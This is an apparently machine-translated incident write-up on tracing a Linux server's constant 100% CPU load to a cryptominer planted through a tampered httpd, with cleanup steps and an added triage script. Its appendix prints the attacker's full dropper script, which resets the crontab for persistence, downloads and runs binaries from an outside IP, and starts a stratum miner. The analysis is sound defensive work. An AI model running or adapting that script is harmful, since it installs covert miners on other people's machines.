2025-04-06 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report--
Most people are not familiar with the material in this article, "How to fix 100% CPU usage on a Linux system", so the editor has summarized it below with detailed content and clear steps; it should be a useful reference. I hope you gain something from reading "How to fix 100% CPU usage on a Linux system".
Case background:
A Linux host has been running at 100% CPU for three consecutive days.
How to deal with it:
1. Log in to the server and check the logs for those three days in /var/log/messages, /var/log/messages.1 and /var/log/messages.3.
2. There is no useful information in dmesg.
3. At this point the host is suspected of having been attacked, so the natural next step is to look at bandwidth usage at the corresponding point in time. It turns out to be completely normal. Continue checking.
4. Suspect that some particular program is misbehaving. The web process is checked first, and the anomaly is found through httpd's error_log: the httpd program has been modified, and the script it executed is the shell script in the appendix.
2014-09-03 19:19:50 (124 KB/s) - "plm" saved [26587/26587]
FINISHED --2014-09-03 19:19:50--
Downloaded: 1 files, 26K in 0.2s (124 KB/s)
+ perl plm
+ rm -rf plm
+ chmod +x apache
+ chmod +x apache-ssl
++ ps x
++ grep -v grep
++ awk '{print $1}'
++ grep stratum
+ kill -9
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
+ killall -9 kav m32 m64 apache apache-ssl
kav: no process killed
m32: no process killed
m64: no process killed
apache: no process killed
apache-ssl: no process killed
+ PATH=.
+ apache -c httpd.conf
a.sh: ./apache: /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
[root@iZ23vqwi2k5Z ~]# + PATH=.
+ apache-ssl -c httpd.conf
[2014-09-03 19:19:15] Starting Stratum on stratum+tcp://80.240.137.183:3333/
[2014-09-03 19:19:50] 2 miner threads started, using 'scrypt' algorithm.
[2014-09-03 19:19:15] Binding thread 0 to cpu 0
[2014-09-03 19:19:15] Binding thread 1 to cpu 1
[2014-09-03 19:19:51] Stratum detected new block
[2014-09-03 19:20:02] Stratum detected new block
[2014-09-03 19:22:53] Stratum detected new block
5. Running this script on an Aliyun test machine reproduces the symptom: the CPU stays at 100%, and the content written to httpd's error_log is basically the same as on the customer's machine (this attacker's basic skills are evidently weak; he did not clean up after himself). The problem is now fully located: the server's web program is suspected of having been modified to do something malicious (suspected mining).
6. Approach to clearing the abnormal process, based on a rough reading of the script's contents.
(1) The first thing that comes to mind is to delete the abnormal directory contents:
# rm -rf /dev/shm/*  (delete)
(2) Use ps to find the specific process and kill it:
# ps aux | grep apache
root 1615 199 0.1 314992 4200 pts/0 Sl 19:19 37:38 apache-ssl -c httpd.conf
# pkill -9 apache
# ps aux | grep apache | awk '{print $2}' | xargs kill -9  (kill the malicious process)
(3) After performing the above operations, the abnormal directory contents are generated again and the apache-ssl process starts again. Looking at the script's operations on cron, empty the crontab, then perform the actions above once more.
# crontab -l
* * * * * /dev/shm/update > /dev/null 2>&1
(4) Try to restart the httpd process; it fails. The log shows the configuration file is at fault. Check the httpd.conf.bak backup file: a conscientious hacker, who did not forget to back up the customer's file first.
# pwd
/alidata/server/httpd/conf
# cp httpd.conf.bak httpd.conf
# /etc/init.d/httpd start  (this step brings the httpd process back)
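The checks from steps 6(2) and 6(3), as an added shell example (not from the article or its author): it looks for the indicators this case turned up (a cron entry running a file out of /dev/shm, a relative-path apache/apache-ssl binary, a stratum pool URL on a command line) against constructed sample crontab and ps output, and wraps a live version with the remediation in the order step 6(3) shows is needed. The function names and sample values are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original article: triage checks for the three
# things the write-up found -- a cron entry launching a file out of /dev/shm,
# a binary named apache/apache-ssl started via PATH=. instead of /usr/sbin/httpd,
# and a process whose arguments point at a stratum mining pool.

# Constructed sample of `crontab -l` on the compromised host (as in the article).
SAMPLE_CRONTAB='* * * * * /dev/shm/update > /dev/null 2>&1'

# Constructed sample of `ps -eo pid,pcpu,args` output; the first and third
# lines are malicious, the second is the legitimate httpd.
SAMPLE_PS='1615 199.0 apache-ssl -c httpd.conf
2201 0.0 /usr/sbin/httpd -k start
2333 0.5 /usr/bin/perl /dev/shm/plm'

# Cron lines whose command lives in a world-writable tmpfs or temp directory.
suspicious_cron() {
    printf '%s\n' "$1" | grep -E '(/dev/shm|/tmp|/var/tmp)/' || true
}

# Processes matching the miner's fingerprints from the error_log above.
suspicious_procs() {
    printf '%s\n' "$1" | awk '
        $3 ~ /^(\.\/)?(apache|apache-ssl)$/ { print; next }  # relative-path "apache"
        index($0, "stratum+tcp://") > 0    { print; next }  # pool URL on the cmdline
        index($0, "/dev/shm/") > 0         { print }        # executing out of /dev/shm
    '
}

# Number of non-empty lines in a result, so callers can test for "any hits".
count_hits() {
    printf '%s\n' "$1" | grep -c . || true
}

# Live run against the real host (as root). The order is the lesson of step
# 6(3): remove the persistence first, then kill, then delete files, otherwise
# cron respawns the miner while you are still cleaning up.
triage_host() {
    echo "== cron ==";     suspicious_cron "$(crontab -l 2>/dev/null; cat /etc/cron.d/* 2>/dev/null)"
    echo "== procs ==";    suspicious_procs "$(ps -eo pid,pcpu,args | tail -n +2)"
    echo "== /dev/shm =="; ls -la /dev/shm 2>/dev/null
    # Remediation, commented out so the function is read-only by default:
    # crontab -r
    # pkill -9 -x apache; pkill -9 -x apache-ssl
    # rm -rf /dev/shm/*
    # cp /alidata/server/httpd/conf/httpd.conf.bak /alidata/server/httpd/conf/httpd.conf && /etc/init.d/httpd start
}

# Demo on the constructed samples: prints the one cron line and two processes.
suspicious_cron "$SAMPLE_CRONTAB"
suspicious_procs "$SAMPLE_PS"
```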
7. Appendix: the malicious user's shell script
#!/bin/sh
crontab -r
cd /dev/shm
rm -rf astatc* update*
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update > /dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
wget 173.255.212.191/update >> /dev/null &&
curl -O http://173.255.212.191/update >> /dev/null &&
chmod u+x update
# chattr -ia bash
# chattr -ia *
curl -O http://173.255.212.191/apache
curl -O http://173.255.212.191/apache-ssl
crul -O http://173.255.212.191/httpd.conf
wget 173.255.212.191/httpd.conf
wget http://173.255.212.191/apache
wget http://173.255.212.191/apache-ssl
wget wget http://173.255.212.191/plm
perl plm
rm -rf plm*
chmod +x apache
chmod +x apache-ssl
# kill -9 `ps x | grep miner | grep -v grep | awk '{print $1}'`
kill -9 `ps x | grep stratum | grep -v grep | awk '{print $1}'`
killall -9 kav m32 m64 apache apache-ssl
PATH="." apache -c httpd.conf &
PATH="." apache-ssl -c httpd.conf &
# chattr +ia bash
# chattr +ia sh
The above is the content of this article on "How to fix 100% CPU usage on a Linux system". I believe you now have a basic understanding of it, and I hope what the editor has shared is helpful. For more on related topics, please follow the industry information channel.